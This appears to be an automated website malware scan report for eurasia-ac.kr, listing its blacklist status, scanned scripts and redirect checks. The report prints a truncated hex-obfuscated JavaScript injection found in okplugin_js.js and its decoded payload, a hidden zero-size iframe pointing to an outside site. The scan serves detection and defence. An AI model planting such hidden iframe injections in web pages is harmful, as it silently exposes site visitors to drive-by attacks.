Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=eurasia-ac.kr
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://eurasia-ac.kr/ | 200 OK Content-Length: 43363 Content-Type: text/html | clean |
http://eurasia-ac.kr/inc/okplugin_js.js | 200 OK Content-Length: 925 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame.
function PrintEmbed(EmbID) { document.write(document.getElementById(EmbID).value); }
var _$=["\x64\x6f\x63\x75\x6d\x65\x6e\x74","\x63\x6f\x6f\x6b\x69\x65","\x69\x6e\x64\x65\x78\x4f\x66",'\x6c\x6f\x6e\x67\x3d',"\x73\x65\x74\x54\x69\x6d\x65","\x67\x65\x74\x54\x69\x6d\x65",'\x6c\x6f\x6e\x67\x3d\x59\x65\x73\x3b\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d',"\x74\x6f\x47\x4d\x54\x53\x74\x72\x69\x6e\x67","\x77\x72\x ...[489 bytes skipped]...
Decoded script: <iframe src=http://meehospital.com/swf/index.html width=0 height=0></iframe>
http://eurasia-ac.kr/js/common.js | 200 OK Content-Length: 5375 Content-Type: application/javascript | clean |
http://eurasia-ac.kr/js/common_ro.js | 200 OK Content-Length: 34593 Content-Type: application/javascript | clean |
http://eurasia-ac.kr/js/popup.js | 200 OK Content-Length: 4165 Content-Type: application/javascript | clean |
http://eurasia-ac.kr/js/object_embed.js | 200 OK Content-Length: 3243 Content-Type: application/javascript | clean |
http://eurasia-ac.kr/js/flash.js | 200 OK Content-Length: 2955 Content-Type: application/javascript | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js | 200 OK Content-Length: 91556 Content-Type: text/javascript | clean |
http://eurasia-ac.kr/login/login.php | 200 OK Content-Length: 20819 Content-Type: text/html | clean |
http://eurasia-ac.kr/login/ | 403 Forbidden Content-Length: 204 Content-Type: text/html | clean |
http://eurasia-ac.kr/test404page.js | 404 Not Found Content-Length: 208 Content-Type: text/html | clean |
http://eurasia-ac.kr/member/join_step1.php | 200 OK Content-Length: 47454 Content-Type: text/html | clean |
http://secure.nuguya.com/nuguya/nice.nuguya.oivs.crypto.js | 200 OK Content-Length: 25258 Content-Type: application/x-javascript | clean |
http://secure.nuguya.com/nuguya/nice.nuguya.oivs.msg.js | 200 OK Content-Length: 9559 Content-Type: application/x-javascript | clean |
http://secure.nuguya.com/nuguya/nice.nuguya.oivs.util.js | 200 OK Content-Length: 14963 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: eurasia-ac.kr
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Mon, 12 Jan 2015 06:52:34 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=euc-kr
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="NOI CURa ADMa DEVa TAIa OUR DELa BUS IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: PHPSESSID=ch1ilm0oefom5pgjr9j2bp6ct1; path=/
Set-Cookie: eurasia-ac_kr-recommend=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT
X-Powered-By: PHP/5.3.13p1
Second query (visit from search engine):
GET / HTTP/1.1
Host: eurasia-ac.kr
Referer: http://www.google.com/search?q=eurasia-ac.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.